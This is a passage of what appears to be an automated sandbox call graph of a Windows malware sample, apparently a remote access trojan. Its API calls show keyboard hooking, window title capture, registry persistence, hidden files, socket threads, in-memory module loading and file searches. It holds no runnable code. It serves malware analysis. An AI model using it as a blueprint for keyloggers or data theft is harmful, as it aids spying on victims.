52347->52351 52348->52346 52349 40c8e3 52352 401e18 26 API calls 52349->52352 52353 40ca18 52350->52353 52354 40c918 52351->52354 52355 40c96a 52351->52355 52357 40c8ed 52352->52357 52358 403b40 28 API calls 52353->52358 52356 403b40 28 API calls 52354->52356 52359 403b40 28 API calls 52355->52359 52361 40c926 52356->52361 52363 401e13 26 API calls 52357->52363 52362 40ca27 52358->52362 52360 40c978 52359->52360 52367 403b40 28 API calls 52360->52367 52368 403b40 28 API calls 52361->52368 53400 40cc37 52362->53400 52363->52348 52370 40c98e 52367->52370 52371 40c93c 52368->52371 52369 40ca45 52372 402860 28 API calls 52369->52372 52373 402860 28 API calls 52370->52373 52374 402860 28 API calls 52371->52374 52375 40ca4f 52372->52375 52376 40c999 52373->52376 52377 40c947 52374->52377 52378 401e13 26 API calls 52375->52378 52379 401e18 26 API calls 52376->52379 52380 401e18 26 API calls 52377->52380 52381 40ca59 52378->52381 52382 40c9a4 52379->52382 52383 40c952 52380->52383 52384 401e13 26 API calls 52381->52384 52385 401e13 26 API calls 52382->52385 52386 401e13 26 API calls 52383->52386 52387 40ca62 52384->52387 52388 40c9ad 52385->52388 52389 40c95b 52386->52389 52390 401e13 26 API calls 52387->52390 52391 401e13 26 API calls 52388->52391 52392 401e13 26 API calls 52389->52392 52393 40ca6b 52390->52393 52391->52357 52392->52357 52394 401e13 26 API calls 52393->52394 52395 40ca74 52394->52395 52396 401e13 26 API calls 52395->52396 52397 40ca7d 52396->52397 52397->51805 52398->51818 52399->51839 52401 412683 RegQueryValueExA RegCloseKey 52400->52401 52402 4126a7 52400->52402 52401->52402 52402->51798 52403->51832 52404->51868 52405->51877 52407 401f66 28 API calls 52406->52407 52408 40c86b 52407->52408 52409 41ae08 28 API calls 52408->52409 52410 40c876 52409->52410 52411 40c89e 32 API calls 52410->52411 52412 40c887 52411->52412 52413 401e13 26 API calls 52412->52413 52414 40c890 52413->52414 52415 401eea 26 API calls 52414->52415 52416 40c898 52415->52416 52416->51904 52417->51889 52418->51923 52420 401e0c 52419->52420 52421->51750 52424 40e183 52423->52424 52425 41a65c LoadResource LockResource SizeofResource 52423->52425 52424->52045 52425->52424 52427 401f86 28 API calls 52426->52427 52428 406066 52427->52428 52428->52056 52434 403c30 52429->52434 52432->52077 52433->52058 52435 403c39 52434->52435 52438 403c59 52435->52438 52439 403c68 52438->52439 52444 4032a4 52439->52444 52441 403c74 52442 402325 28 API calls 52441->52442 52443 403b73 52442->52443 52443->52077 52445 4032b0 52444->52445 52446 4032ad 52444->52446 52449 4032b6 28 API calls 52445->52449 52446->52441 52450->52081 52454 402e85 52452->52454 52453 402ea9 52453->52090 52454->52453 52455 402e98 52454->52455 52457 402eae 52454->52457 52459 403445 28 API calls 52455->52459 52457->52453 52460 40225b 26 API calls 52457->52460 52459->52453 52460->52453 52462 404bd0 52461->52462 52465 40245c 52462->52465 52464 404be4 52464->52093 52466 402469 52465->52466 52468 402478 52466->52468 52469 402ad3 28 API calls 52466->52469 52468->52464 52469->52468 52472 4021c6 52470->52472 52471 4021e8 52471->52096 52472->52471 52473 40262e 26 API calls 52472->52473 52473->52471 52475 401e94 52474->52475 52477 41b183 52476->52477 52478 41b168 GetCurrentProcess IsWow64Process 52476->52478 52477->52107 52478->52477 52479 41b17f 52478->52479 52479->52107 52481 412541 RegQueryValueExA RegCloseKey 52480->52481 52482 412569 52480->52482 52481->52482 52483 401f66 28 API calls 52482->52483 52484 41257e 52483->52484 52484->52110 52485->52118 52487 40b02f 52486->52487 52490 40b04b 52487->52490 52489 40b045 52489->52129 52491 40b055 52490->52491 52493 40b060 52491->52493 52494 40b138 28 API calls 52491->52494 52493->52489 52494->52493 52495->52133 52496->52135 52498 40230d 52497->52498 52499 402325 28 API calls 52498->52499 52500 401f80 52499->52500 52500->51811 52519 43a545 52501->52519 52503 43998b 52528 4392de 38 API calls 2 library calls 52503->52528 52505 439950 52505->52503 52506 439965 52505->52506 52518 40dd54 52505->52518 52526 445354 20 API calls __dosmaperr 52506->52526 52508 43996a 52527 43a827 26 API calls _Deallocate 52508->52527 52511 439997 52512 4399c6 52511->52512 52529 43a58a 42 API calls __Toupper 52511->52529 52515 439a32 52512->52515 52530 43a4f1 26 API calls 2 library calls 52512->52530 52531 43a4f1 26 API calls 2 library calls 52515->52531 52516 439af9 _swprintf 52516->52518 52532 445354 20 API calls __dosmaperr 52516->52532 52518->51825 52518->51827 52520 43a54a 52519->52520 52521 43a55d 52519->52521 52533 445354 20 API calls __dosmaperr 52520->52533 52521->52505 52523 43a54f 52534 43a827 26 API calls _Deallocate 52523->52534 52525 43a55a 52525->52505 52526->52508 52527->52518 52528->52511 52529->52511 52530->52515 52531->52516 52532->52518 52533->52523 52534->52525 52539 401e9b 52535->52539 52537 4027d9 52537->52174 52538->52178 52540 401ea7 52539->52540 52541 40245c 28 API calls 52540->52541 52542 401eb9 52541->52542 52542->52537 52544 409855 52543->52544 52545 4124b7 3 API calls 52544->52545 52546 40985c 52545->52546 52547 409870 52546->52547 52548 40988a 52546->52548 52549 4095cf 52547->52549 52550 409875 52547->52550 52562 4082dc 52548->52562 52549->51862 52552 4082dc 28 API calls 52550->52552 52554 409883 52552->52554 52588 409959 29 API calls 52554->52588 52557 409888 52557->52549 52558->52204 52741 402d8b 52559->52741 52561 4028dd 52561->52207 52563 4082eb 52562->52563 52589 408431 52563->52589 52565 408309 52566 4098a5 52565->52566 52594 40affa 52566->52594 52569 4098f6 52571 401f66 28 API calls 52569->52571 52570 4098ce 52572 401f66 28 API calls 52570->52572 52573 409901 52571->52573 52574 4098d8 52572->52574 52575 401f66 28 API calls 52573->52575 52576 41ae08 28 API calls 52574->52576 52577 409910 52575->52577 52578 4098e6 52576->52578 52579 41a686 79 API calls 52577->52579 52598 40a876 31 API calls ___crtLCMapStringA 52578->52598 52581 409915 CreateThread 52579->52581 52584 409930 CreateThread 52581->52584 52585 40993c CreateThread 52581->52585 52610 4099a9 52581->52610 52582 4098ed 52583 401eea 26 API calls 52582->52583 52583->52569 52584->52585 52607 409993 52584->52607 52586 401e13 26 API calls 52585->52586 52604 4099b5 52585->52604 52587 409950 52586->52587 52587->52549 52588->52557 52740 40999f 136 API calls 52588->52740 52591 40843d 52589->52591 52590 40845b 52590->52565 52591->52590 52593 402f0d 28 API calls 52591->52593 52593->52590 52596 40b006 52594->52596 52595 4098c3 52595->52569 52595->52570 52596->52595 52599 403b9e 52596->52599 52598->52582 52600 403ba8 52599->52600 52602 403bb3 52600->52602 52603 403cfd 28 API calls 52600->52603 52602->52595 52603->52602 52613 40a3f4 52604->52613 52662 4099e4 52607->52662 52683 409e48 52610->52683 52634 40a402 52613->52634 52614 4099be 52615 40a45c Sleep GetForegroundWindow GetWindowTextLengthW 52617 40b027 28 API calls 52615->52617 52617->52634 52620 41aca0 GetLastInputInfo GetTickCount 52620->52634 52621 40a4a2 GetWindowTextW 52621->52634 52623 40a5ff 52625 401e13 26 API calls 52623->52625 52624 40affa 28 API calls 52624->52634 52625->52614 52626 40a569 Sleep 52626->52634 52629 401f66 28 API calls 52629->52634 52630 40a4f1 52631 4082dc 28 API calls 52630->52631 52630->52634 52646 40a876 31 API calls ___crtLCMapStringA 52630->52646 52631->52630 52634->52614 52634->52615 52634->52620 52634->52621 52634->52623 52634->52624 52634->52626 52634->52629 52634->52630 52636 4028cf 28 API calls 52634->52636 52637 405ce6 28 API calls 52634->52637 52638 41ae08 28 API calls 52634->52638 52639 409d58 27 API calls 52634->52639 52640 401e13 26 API calls 52634->52640 52641 401eea 26 API calls 52634->52641 52642 433519 5 API calls __Init_thread_wait 52634->52642 52643 4338a5 29 API calls __onexit 52634->52643 52644 4334cf EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 52634->52644 52645 4082a8 28 API calls 52634->52645 52647 40b0dd 28 API calls 52634->52647 52648 40ae58 44 API calls 2 library calls 52634->52648 52649 440c51 52634->52649 52653 404c9e 28 API calls 52634->52653 52636->52634 52637->52634 52638->52634 52639->52634 52640->52634 52641->52634 52642->52634 52643->52634 52644->52634 52645->52634 52646->52630 52647->52634 52648->52634 52650 440c5d 52649->52650 52654 440a4d 52650->52654 52653->52634 52655 440a64 52654->52655 52658 440aa5 52655->52658 52660 445354 20 API calls __dosmaperr 52655->52660 52657 440a9b 52661 43a827 26 API calls _Deallocate 52657->52661 52658->52634 52660->52657 52661->52658 52663 409a63 GetMessageA 52662->52663 52664 4099ff GetModuleHandleA SetWindowsHookExA 52662->52664 52665 409a75 TranslateMessage DispatchMessageA 52663->52665 52666 40999c 52663->52666 52664->52663 52667 409a1b GetLastError 52664->52667 52665->52663 52665->52666 52677 41ad46 52667->52677 52671 409a3e 52672 401f66 28 API calls 52671->52672 52673 409a4d 52672->52673 52674 41a686 79 API calls 52673->52674 52675 409a52 52674->52675 52676 401eea 26 API calls 52675->52676 52676->52666 52678 440c51 26 API calls 52677->52678 52679 41ad67 52678->52679 52680 401f66 28 API calls 52679->52680 52681 409a31 52680->52681 52682 404c9e 28 API calls 52681->52682 52682->52671 52684 409e5d Sleep 52683->52684 52703 409d97 52684->52703 52686 4099b2 52687 409e9d CreateDirectoryW 52692 409e6f 52687->52692 52688 409eae GetFileAttributesW 52688->52692 52689 401d64 28 API calls 52689->52692 52690 409ec5 SetFileAttributesW 52690->52692 52692->52684 52692->52686 52692->52687 52692->52688 52692->52689 52692->52690 52701 409f10 52692->52701 52716 41b58f 52692->52716 52693 409f3f PathFileExistsW 52693->52701 52694 401f86 28 API calls 52694->52701 52696 40a048 SetFileAttributesW 52696->52692 52697 401eef 26 API calls 52697->52701 52698 406052 28 API calls 52698->52701 52699 401eea 26 API calls 52699->52701 52701->52693 52701->52694 52701->52696 52701->52697 52701->52698 52701->52699 52702 401eea 26 API calls 52701->52702 52725 41b61a CreateFileW 52701->52725 52733 41b687 CreateFileW SetFilePointer WriteFile CloseHandle 52701->52733 52702->52692 52704 409e44 52703->52704 52707 409dad 52703->52707 52704->52692 52705 409dcc CreateFileW 52706 409dda GetFileSize 52705->52706 52705->52707 52706->52707 52708 409e0f CloseHandle 52706->52708 52707->52705 52707->52708 52709 409e21 52707->52709 52710 409e04 Sleep 52707->52710 52711 409dfd 52707->52711 52708->52707 52709->52704 52713 4082dc 28 API calls 52709->52713 52710->52708 52734 40a7f0 83 API calls 52711->52734 52714 409e3d 52713->52714 52715 4098a5 127 API calls 52714->52715 52715->52704 52717 41b5a2 CreateFileW 52716->52717 52719 41b5db 52717->52719 52720 41b5df 52717->52720 52719->52692 52721 41b5f6 WriteFile 52720->52721 52722 41b5e6 SetFilePointer 52720->52722 52723 41b60b CloseHandle 52721->52723 52724 41b609 52721->52724 52722->52721 52722->52723 52723->52719 52724->52723 52726 41b640 52725->52726 52727 41b644 GetFileSize 52725->52727 52726->52701 52735 401e65 52727->52735 52729 41b658 52730 41b66a ReadFile 52729->52730 52731 41b677 52730->52731 52732 41b679 CloseHandle 52730->52732 52731->52732 52732->52726 52733->52701 52734->52710 52736 401e6d 52735->52736 52738 401e77 52736->52738 52739 4023b7 28 API calls 52736->52739 52738->52729 52739->52738 52742 402d97 52741->52742 52745 4030f7 52742->52745 52744 402dab 52744->52561 52746 403101 52745->52746 52748 403115 52746->52748 52749 4036c2 28 API calls 52746->52749 52748->52744 52749->52748 52751 403b48 52750->52751 52757 403b7a 52751->52757 52754 403cbb 52761 403dc2 52754->52761 52756 403cc9 52756->52215 52758 403b86 52757->52758 52759 403b9e 28 API calls 52758->52759 52760 403b5a 52759->52760 52760->52754 52762 403dce 52761->52762 52765 402ffd 52762->52765 52764 403de3 52764->52756 52766 40300e 52765->52766 52767 4032a4 28 API calls 52766->52767 52768 40301a 52767->52768 52770 40302e 52768->52770 52771 4035e8 28 API calls 52768->52771 52770->52764 52771->52770 52778 4395ba 52772->52778 52776 412814 52775->52776 52777 4127ed RegSetValueExA RegCloseKey 52775->52777 52776->52241 52777->52776 52781 43953b 52778->52781 52780 401608 52780->52239 52782 43954a 52781->52782 52783 43955e 52781->52783 52789 445354 20 API calls __dosmaperr 52782->52789 52788 43955a __alldvrm 52783->52788 52791 447601 11 API calls 2 library calls 52783->52791 52785 43954f 52790 43a827 26 API calls _Deallocate 52785->52790 52788->52780 52789->52785 52790->52788 52791->52788 52795 41aab9 ctype ___scrt_fastfail 52792->52795 52793 401f66 28 API calls 52794 41ab2e 52793->52794 52794->52245 52795->52793 52796->52261 52798 413fb3 getaddrinfo WSASetLastError 52797->52798 52799 413fa9 52797->52799 52798->52288 52944 413e37 35 API calls ___std_exception_copy 52799->52944 52801 413fae 52801->52798 52803 404206 socket 52802->52803 52804 4041fd 52802->52804 52806 404220 52803->52806 52807 404224 CreateEventW 52803->52807 52945 404262 WSAStartup 52804->52945 52806->52288 52807->52288 52808 404202 52808->52803 52808->52806 52810 4049b1 52809->52810 52811 40492a 52809->52811 52810->52288 52812 404933 52811->52812 52813 404987 CreateEventA CreateThread 52811->52813 52814 404942 GetLocalTime 52811->52814 52812->52813 52813->52810 52947 404b1d 52813->52947 52815 41ad46 28 API calls 52814->52815 52816 40495b 52815->52816 52946 404c9e 28 API calls 52816->52946 52818 404968 52819 401f66 28 API calls 52818->52819 52820 404977 52819->52820 52821 41a686 79 API calls 52820->52821 52822 40497c 52821->52822 52823 401eea 26 API calls 52822->52823 52823->52813 52825 4043e1 52824->52825 52826 4042b3 52824->52826 52827 404343 52825->52827 52828 4043e7 WSAGetLastError 52825->52828 52826->52827 52830 404cbf 28 API calls 52826->52830 52850 4042e8 52826->52850 52827->52288 52828->52827 52829 4043f7 52828->52829 52831 4042f7 52829->52831 52832 4043fc 52829->52832 52834 4042d4 52830->52834 52837 401f66 28 API calls 52831->52837 52956 41bc76 30 API calls 52832->52956 52838 401f66 28 API calls 52834->52838 52836 4042f0 52836->52831 52840 404306 52836->52840 52841 404448 52837->52841 52842 4042e3 52838->52842 52839 40440b 52957 404c9e 28 API calls 52839->52957 52847 404315 52840->52847 52848 40434c 52840->52848 52844 401f66 28 API calls 52841->52844 52845 41a686 79 API calls 52842->52845 52849 404457 52844->52849 52845->52850 52846 404418 52851 401f66 28 API calls 52846->52851 52852 401f66 28 API calls 52847->52852 52953 420f34 56 API calls 52848->52953 52853 41a686 79 API calls 52849->52853 52951 420151 27 API calls 52850->52951 52855 404427 52851->52855 52856 404324 52852->52856 52853->52827 52858 41a686 79 API calls 52855->52858 52859 401f66 28 API calls 52856->52859 52857 404354 52860 404389 52857->52860 52861 404359 52857->52861 52862 40442c 52858->52862 52863 404333 52859->52863 52955 4202ea 28 API calls 52860->52955 52865 401f66 28 API calls 52861->52865 52866 401eea 26 API calls 52862->52866 52867 41a686 79 API calls 52863->52867 52869 404368 52865->52869 52866->52827 52871 404338 52867->52871 52868 404391 52872 4043be CreateEventW CreateEventW 52868->52872 52874 401f66 28 API calls 52868->52874 52870 401f66 28 API calls 52869->52870 52873 404377 52870->52873 52952 41dc15 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 52871->52952 52872->52827 52875 41a686 79 API calls 52873->52875 52877 4043a7 52874->52877 52878 40437c 52875->52878 52879 401f66 28 API calls 52877->52879 52954 420592 54 API calls 52878->52954 52881 4043b6 52879->52881 52882 41a686 79 API calls 52881->52882 52883 4043bb 52882->52883 52883->52872 52958 41a945 GlobalMemoryStatusEx 52884->52958 52886 41a982 52886->52288 52959 413646 52887->52959 52891 40cc0d 52890->52891 52892 41246e 3 API calls 52891->52892 52894 40cc14 52892->52894 52893 40cc2c 52893->52288 52894->52893 52895 4124b7 3 API calls 52894->52895 52895->52893 52897 401f86 28 API calls 52896->52897 52898 41ae03 52897->52898 52898->52288 52899->52288 52901 436050 ___scrt_fastfail 52900->52901 52902 41ac71 GetForegroundWindow GetWindowTextW 52901->52902 52903 403b40 28 API calls 52902->52903 52904 41ac9b 52903->52904 52904->52288 52906 401f66 28 API calls 52905->52906 52907 40e69e 52906->52907 52907->52288 52908->52288 52909->52288 52910->52288 52912 4027f8 52911->52912 52913 402e78 28 API calls 52912->52913 52914 402814 52913->52914 52914->52288 52921 4045ec 52915->52921 52916 43a88c ___crtLCMapStringA 21 API calls 52916->52921 52918 401f86 28 API calls 52918->52921 52919 401eef 26 API calls 52919->52921 52920 404666 52922 4047eb 98 API calls 52920->52922 52921->52916 52921->52918 52921->52919 52921->52920 52923 401eea 26 API calls 52921->52923 52992 40455b 52921->52992 52998 404688 52921->52998 52924 40466d 52922->52924 52923->52921 52925 401eea 26 API calls 52924->52925 52926 404676 52925->52926 52927 401eea 26 API calls 52926->52927 52928 40467f 52927->52928 52928->52288 52930->52288 52932 404805 SetEvent CloseHandle 52931->52932 52933 40481c closesocket 52931->52933 52934 40489c 52932->52934 52935 404829 52933->52935 52934->52288 52936 40483f 52935->52936 53396 404ab1 83 API calls 52935->53396 52938 404851 WaitForSingleObject 52936->52938 52939 404892 SetEvent CloseHandle 52936->52939 53397 41dc15 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 52938->53397 52939->52934 52941 404860 SetEvent WaitForSingleObject 53398 41dc15 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 52941->53398 52943 404878 SetEvent CloseHandle CloseHandle 52943->52939 52944->52801 52945->52808 52946->52818 52950 404b29 101 API calls 52947->52950 52949 404b26 52950->52949 52951->52836 52952->52827 52953->52857 52954->52871 52955->52868 52956->52839 52957->52846 52958->52886 52962 413619 52959->52962 52963 41362e ___scrt_initialize_default_local_stdio_options 52962->52963 52966 43e2dd 52963->52966 52969 43b030 52966->52969 52970 43b070 52969->52970 52971 43b058 52969->52971 52970->52971 52972 43b078 52970->52972 52986 445354 20 API calls __dosmaperr 52971->52986 52988 4392de 38 API calls 2 library calls 52972->52988 52975 43b05d 52987 43a827 26 API calls _Deallocate 52975->52987 52976 43b088 52989 43b7b6 20 API calls 2 library calls 52976->52989 52979 433d2c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 52981 41363c 52979->52981 52980 43b100 52990 43be24 50 API calls 3 library calls 52980->52990 52981->52288 52984 43b10b 52991 43b820 20 API calls _free 52984->52991 52985 43b068 52985->52979 52986->52975 52987->52985 52988->52976 52989->52980 52990->52984 52991->52985 52993 404592 recv 52992->52993 52994 404565 WaitForSingleObject 52992->52994 52996 4045a5 52993->52996 53011 420556 56 API calls 52994->53011 52996->52921 52997 404581 SetEvent 52997->52996 53004 4046a3 52998->53004 52999 4047d8 53000 401eea 26 API calls 52999->53000 53001 4047e1 53000->53001 53001->52921 53002 401eef 26 API calls 53002->53004 53003 401eea 26 API calls 53003->53004 53004->52999 53004->53002 53004->53003 53005 401ebd 28 API calls 53004->53005 53006 401fbd 28 API calls 53004->53006 53008 403b60 28 API calls 53004->53008 53010 402654 26 API calls 53004->53010 53012 411b60 53004->53012 53007 404772 CreateEventA CreateThread WaitForSingleObject CloseHandle 53005->53007 53006->53004 53007->53004 53311 414b9b 53007->53311 53008->53004 53010->53004 53011->52997 53013 411b72 53012->53013 53014 403b60 28 API calls 53013->53014 53015 411b85 53014->53015 53016 401fbd 28 API calls 53015->53016 53017 411b94 53016->53017 53018 401fbd 28 API calls 53017->53018 53019 411ba3 53018->53019 53020 41afc3 28 API calls 53019->53020 53021 411bac 53020->53021 53022 411c60 53021->53022 53024 401d64 28 API calls 53021->53024 53023 401d8c 26 API calls 53022->53023 53025 411c69 53023->53025 53026 411bc8 53024->53026 53027 401eea 26 API calls 53025->53027 53028 401fbd 28 API calls 53026->53028 53029 411c72 53027->53029 53030 411bd0 53028->53030 53032 401eea 26 API calls 53029->53032 53031 401d64 28 API calls 53030->53031 53033 411be0 53031->53033 53034 411c7a 53032->53034 53035 401fbd 28 API calls 53033->53035 53034->53004 53036 411be8 53035->53036 53037 401d64 28 API calls 53036->53037 53038 411bf8 53037->53038 53039 401fbd 28 API calls 53038->53039 53040 411c00 53039->53040 53041 401d64 28 API calls 53040->53041 53042 411c10 53041->53042 53043 401fbd 28 API calls 53042->53043 53044 411c18 53043->53044 53045 401d64 28 API calls 53044->53045 53046 411c28 53045->53046 53047 401fbd 28 API calls 53046->53047 53048 411c30 53047->53048 53049 401d64 28 API calls 53048->53049 53050 411c43 53049->53050 53051 401fbd 28 API calls 53050->53051 53052 411c4b 53051->53052 53056 411c81 GetModuleFileNameW 53052->53056 53055 4047eb 98 API calls 53055->53022 53060 411cac 53056->53060 53057 40c854 32 API calls 53057->53060 53058 401eea 26 API calls 53058->53060 53059 41ab38 42 API calls 53059->53060 53060->53057 53060->53058 53060->53059 53061 4176b6 31 API calls 53060->53061 53062 411dea Sleep 53060->53062 53063 403b40 28 API calls 53060->53063 53064 403cbb 28 API calls 53060->53064 53065 403cdc 28 API calls 53060->53065 53066 401e13 26 API calls 53060->53066 53067 411e8c Sleep 53060->53067 53068 4028cf 28 API calls 53060->53068 53069 411f2e Sleep 53060->53069 53070 41b61a 32 API calls 53060->53070 53071 411f90 DeleteFileW 53060->53071 53072 411fc7 DeleteFileW 53060->53072 53073 412019 Sleep 53060->53073 53074 412003 DeleteFileW 53060->53074 53075 412092 53060->53075 53081 41205e Sleep 53060->53081 53061->53060 53062->53060 53063->53060 53064->53060 53065->53060 53066->53060 53067->53060 53068->53060 53069->53060 53070->53060 53071->53060 53072->53060 53073->53060 53074->53060 53076 401e13 26 API calls 53075->53076 53077 41209e 53076->53077 53078 401e13 26 API calls 53077->53078 53079 4120aa 53078->53079 53080 401e13 26 API calls 53079->53080 53082 4120b6 53080->53082 53084 401e13 26 API calls 53081->53084 53083 40b027 28 API calls 53082->53083 53085 4120c9 53083->53085 53089 41206e 53084->53089 53087 401fbd 28 API calls 53085->53087 53086 401e13 26 API calls 53086->53089 53088 4120e9 53087->53088 53198 4123f7 53088->53198 53089->53060 53089->53086 53091 412090 53089->53091 53091->53082 53093 401e13 26 API calls 53094 412100 53093->53094 53095 412125 53094->53095 53096 412274 53094->53096 53210 41aec8 53095->53210 53097 41aec8 28 API calls 53096->53097 53099 41227d 53097->53099 53101 4027ec 28 API calls 53099->53101 53104 4122b2 53101->53104 53102 41ad46 28 API calls 53103 412146 53102->53103 53106 4027ec 28 API calls 53103->53106 53105 4027cb 28 API calls 53104->53105 53107 4122c1 53105->53107 53108 412176 53106->53108 53109 4027cb 28 API calls 53107->53109 53110 4027cb 28 API calls 53108->53110 53111 4122cd 53109->53111 53112 412185 53110->53112 53113 4027cb 28 API calls 53111->53113 53114 4027cb 28 API calls 53112->53114 53115 4122dc 53113->53115 53116 412194 53114->53116 53117 4027cb 28 API calls 53115->53117 53118 4027cb 28 API calls 53116->53118 53119 4122eb 53117->53119 53120 4121a3 53118->53120 53121 4027cb 28 API calls 53119->53121 53122 4027cb 28 API calls 53120->53122 53123 4122fa 53121->53123 53124 4121b2 53122->53124 53125 4027cb 28 API calls 53123->53125 53126 4027cb 28 API calls 53124->53126 53127 412309 53125->53127 53128 4121be 53126->53128 53216 40275c 28 API calls 53127->53216 53130 4027cb 28 API calls 53128->53130 53132 4121ca 53130->53132 53131 412313 53133 404468 60 API calls 53131->53133 53214 40275c 28 API calls 53132->53214 53136 412320 53133->53136 53135 4121d9 53138 4027cb 28 API calls 53135->53138 53137 401eea 26 API calls 53136->53137 53139 41232c 53137->53139 53140 4121e5 53138->53140 53141 401eea 26 API calls 53139->53141 53215 40275c 28 API calls 53140->53215 53143 412338 53141->53143 53145 401eea 26 API calls 53143->53145 53144 4121ef 53146 404468 60 API calls 53144->53146 53147 412344 53145->53147 53148 4121fc 53146->53148 53149 401eea 26 API calls 53147->53149 53150 401eea 26 API calls 53148->53150 53151 412350 53149->53151 53152 412205 53150->53152 53153 401eea 26 API calls 53151->53153 53154 401eea 26 API calls 53152->53154 53155 412359 53153->53155 53156 41220e 53154->53156 53157 401eea 26 API calls 53155->53157 53158 401eea 26 API calls 53156->53158 53159 412362 53157->53159 53160 412217 53158->53160 53161 401eea 26 API calls 53159->53161 53162 401eea 26 API calls 53160->53162 53163 412268 53161->53163 53164 412220 53162->53164 53167 401eea 26 API calls 53163->53167 53165 401eea 26 API calls 53164->53165 53166 41222c 53165->53166 53169 401eea 26 API calls 53166->53169 53168 412374 53167->53168 53170 401e13 26 API calls 53168->53170 53171 412238 53169->53171 53172 412380 53170->53172 53173 401eea 26 API calls 53171->53173 53174 401eea 26 API calls 53172->53174 53175 412244 53173->53175 53176 41238c 53174->53176 53177 401eea 26 API calls 53175->53177 53178 401eea 26 API calls 53176->53178 53179 412250 53177->53179 53180 412398 53178->53180 53181 401eea 26 API calls 53179->53181 53182 401eea 26 API calls 53180->53182 53183 41225c 53181->53183 53184 4123a4 53182->53184 53185 401eea 26 API calls 53183->53185 53186 401eea 26 API calls 53184->53186 53185->53163 53187 4123b0 53186->53187 53188 401eea 26 API calls 53187->53188 53189 4123bc 53188->53189 53190 401eea 26 API calls 53189->53190 53191 4123c8 53190->53191 53192 401eea 26 API calls 53191->53192 53193 4123d4 53192->53193 53194 401eea 26 API calls 53193->53194 53195 4123e0 53194->53195 53196 401eea 26 API calls 53195->53196 53197 411c50 53196->53197 53197->53055 53199 412435 53198->53199 53201 412406 53198->53201 53200 412444 53199->53200 53220 10001c5b 53199->53220 53202 403b40 28 API calls 53200->53202 53217 410b0d 53201->53217 53204 412450 53202->53204 53206 401eea 26 API calls 53204->53206 53208 4120f4 53206->53208 53208->53093 53211 41aed5 53210->53211 53212 401f86 28 API calls 53211->53212 53213 412131 53212->53213 53213->53102 53214->53135 53215->53144 53216->53131 53225 410b19 53217->53225 53221 10001c6b ___scrt_fastfail 53220->53221 53272 100012ee 53221->53272 53223 10001c87 53223->53200 53224 410d8d 28 API calls ___crtLCMapStringA 53224->53199 53256 4105b9 53225->53256 53227 410b38 53229 4105b9 SetLastError 53227->53229 53242 410c1f SetLastError 53227->53242 53253 410b15 53227->53253 53231 410b5f 53229->53231 53230 410bbf GetNativeSystemInfo 53232 410bd6 53230->53232 53231->53230 53231->53231 53231->53242 53231->53253 53232->53242 53259 410abe VirtualAlloc 53232->53259 53234 410bfe 53235 410c26 GetProcessHeap HeapAlloc 53234->53235 53269 410abe VirtualAlloc 53234->53269 53237 410c3d 53235->53237 53238 410c4f 53235->53238 53270 410ad5 VirtualFree 53237->53270 53239 4105b9 SetLastError 53238->53239 53243 410c98 53239->53243 53240 410c16 53240->53235 53240->53242 53242->53253 53244 410d45 53243->53244 53260 410abe VirtualAlloc 53243->53260 53271 410eb0 GetProcessHeap HeapFree 53244->53271 53247 410cb1 ctype 53261 4105cc SetLastError ctype ___scrt_fastfail 53247->53261 53249 410cdd 53249->53244 53262 410975 SetLastError SetLastError 53249->53262 53251 410d04 53251->53244 53263 410769 53251->53263 53253->53224 53254 410d0f 53254->53244 53254->53253 53255 410d3a SetLastError 53254->53255 53255->53244 53257 4105c8 53256->53257 53258 4105bd SetLastError 53256->53258 53257->53227 53258->53227 53259->53234 53260->53247 53261->53249 53262->53251 53267 410790 53263->53267 53264 41087f 53265 4106d3 VirtualProtect 53264->53265 53266 410891 53265->53266 53266->53254 53267->53264 53267->53266 53268 4106d3 VirtualProtect 53267->53268 53268->53267 53269->53240 53270->53242 53271->53253 53273 10001324 ___scrt_fastfail 53272->53273 53274 100013b7 GetEnvironmentVariableW 53273->53274 53298 100010f1 53274->53298 53277 100010f1 57 API calls 53278 10001465 53277->53278 53279 100010f1 57 API calls 53278->53279 53280 10001479 53279->53280 53281 100010f1 57 API calls 53280->53281 53282 1000148d 53281->53282 53283 100010f1 57 API calls 53282->53283 53284 100014a1 53283->53284 53285 100010f1 57 API calls 53284->53285 53286 100014b5 lstrlenW 53285->53286 53287 100014d2 53286->53287 53288 100014d9 lstrlenW 53286->53288 53287->53223 53289 100010f1 57 API calls 53288->53289 53290 10001501 lstrlenW lstrcatW 53289->53290 53291 100010f1 57 API calls 53290->53291 53292 10001539 lstrlenW lstrcatW 53291->53292 53293 100010f1 57 API calls 53292->53293 53294 1000156b lstrlenW lstrcatW 53293->53294 53295 100010f1 57 API calls 53294->53295 53296 1000159d lstrlenW lstrcatW 53295->53296 53297 100010f1 57 API calls 53296->53297 53297->53287 53299 10001118 ___scrt_fastfail 53298->53299 53300 10001129 lstrlenW 53299->53300 53301 10002c40 ___scrt_fastfail 53300->53301 53302 10001148 lstrcatW lstrlenW 53301->53302 53303 10001177 lstrlenW FindFirstFileW 53302->53303 53304 10001168 lstrlenW 53302->53304 53305 100011a0 53303->53305 53306 100011e1 53303->53306 53304->53303 53307 100011c7 FindNextFileW 53305->53307 53310 100011aa 53305->53310 53306->53277 53307->53305 53309 100011da FindClose 53307->53309 53308 10001000 49 API calls 53308->53310 53309->53306 53310->53307 53310->53308 53312 401fbd 28 API calls 53311->53312 53313 414bbd SetEvent 53312->53313 53314 414bd2 53313->53314 53315 403b60 28 API calls 53314->53315 53316 414bec 53315->53316 53317 401fbd 28 API calls 53316->53317 53318 414bfc 53317->53318 53319 401fbd 28 API calls 53318->53319 53320 414c0e 53319->53320 53321 41afc3 28 API calls 53320->53321 53322 414c17 53321->53322 53323 414d8a 53322->53323 53325 414c37 GetTickCount 53322->53325 53385 414d99 53322->53385 53324 401d8c 26 API calls 53323->53324 53326 4161fb 53324->53326 53327 41ad46 28 API calls 53325->53327 53329 401eea 26 API calls 53326->53329 53330 414c4d 53327->53330 53328 414dad 53395 404ab1 83 API calls 53328->53395 53332 416207 53329->53332 53390 41aca0 GetLastInputInfo GetTickCount 53330->53390 53335 401eea 26 API calls 53332->53335 53334 414d7d 53334->53323 53337 416213 53335->53337 53336 414c54 53338 41ad46 28 API calls 53336->53338 53339 414c5f 53338->53339 53340 41ac52 30 API calls 53339->53340 53341 414c6d 53340->53341 53342 